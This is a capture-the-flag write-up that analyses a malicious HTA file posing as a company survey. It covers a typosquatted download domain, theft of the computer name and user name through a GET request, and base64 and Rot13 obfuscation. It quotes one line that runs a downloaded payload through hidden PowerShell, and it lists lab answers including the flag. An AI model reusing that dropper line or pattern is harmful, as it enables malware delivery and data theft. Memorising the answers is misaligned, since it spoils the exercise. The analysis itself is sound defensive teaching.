Task 2 : Malware Analysis

HTA Overview

Not long ago - in the summer of 2025 - researchers discovered that ransomware groups were using HTA files disguised as fake verification pages to spread the Epsilon Red ransomware. During that campaign, many organisations were affected, and security teams were reminded how important it is to understand what HTA files are, and why they appear so often in corporate environments.

So, what exactly are HTA files, and why do they exist? In Wareville's digital kingdom, not every strange-looking file is a threat. Some were originally created to make the daily work of developers and administrators easier. One such helpful invention is the HTA file, short for HTML Application. An HTA file is like a small desktop app built using familiar web technologies such as HTML, CSS, and JavaScript. Unlike regular web pages that open inside a browser, HTA files run directly on Windows through a built-in component called Microsoft HTML Application Host - mshta.exe process. This allows them to look and behave like lightweight programs with their own interfaces and actions. In legitimate use cases, HTA files serve several practical purposes in Wareville and beyond:

• Automating administrative or setup tasks.

• Providing quick interfaces for internal scripts.

• Testing small prototypes without building full software.

• Offering lightweight IT support utilities for daily use.

In short, HTA files were designed as a convenient way to blend the simplicity of the web with the power of desktop applications, a tool that many TBFC’s engineers and elves still use to keep SOC-mas operations running smoothly.

HTA File Structure

Before the defenders of TBFC can recognise suspicious HTA files, it's important to understand how a normal HTA file is built. Luckily, their structure is quite simple, in fact, it's very similar to a regular HTML page. An HTA file usually contains three main parts:

1. The HTA declaration: This defines the file as an HTML Application and can include basic properties like title, window size, and behaviour.

2. The interface (HTML and CSS): This section creates the layout and visuals, such as buttons, forms, or text.

3. The script (VBScript or JavaScript): Here is where the logic lives; it defines what actions the HTA will perform when opened or when a user interacts with it.

Answer the questions below

What is the title of the HTA application? Best Festival Company Developer Survey

What VBScript function is acting as if it is downloading the survey questions? getQuestions

What URL domain (including sub-domain) is the "questions" being downloaded from? survey.bestfestiivalcompany.com

Malhare seems to be using typosquatting, domains that look the same as the real one, in an attempt to hide the fact that the domain is not the inteded one, what character in the domain gives this away?

i

Malicious HTAs often include real-looking data, like survey questions, to make the file seem authentic. How many questions does the survey have?

4

Notice how even in code, social engineering persists, fake incentives like contests or trips hide in plain sight to build trust. The survey entices participation by promising a chance to win a trip to where?

south pole

The HTA is enumerating information from the local host executing the application. What two pieces of information about the computer it is running on are being exfiltrated? You should provide the two object names separated by commas.

ComputerName,UserName

What endpoint is the enumerated data being exfiltrated to?

/details

What HTTP method is being used to exfiltrate the data?

GET

After reviewing the function intended to get the survey questions, it seems that the data from the download of the questions is actually being executed. What is the line of code that executes the contents of the download?

runObject.Run "powershell.exe -nop -w hidden -c " & feedbackString, 0, False

It seems as if the malware site has been taken down, so we cannot download the contents that the malware was executing. Fortunately, one of the elves created a copy when the site was still active. Download the contents from here. What popular encoding scheme was used in an attempt to obfuscate the download?

base64

Decode the payload. It seems as if additional steps where taken to hide the malware! What common encryption scheme was used in the script?

Rot13

Either run the script or decrypt the flag value using online tools such as CyberChef. What is the flag value?

THM{Malware.Analysed}

Stay ahead of hackers 🚀 Subscribe to my cybersecurity blog for exclusive malware analysis, hands-on labs, and real-world threat insights — and join my Telegram channel for daily updates, tools, and insider tips you won’t find anywhere else. 🔐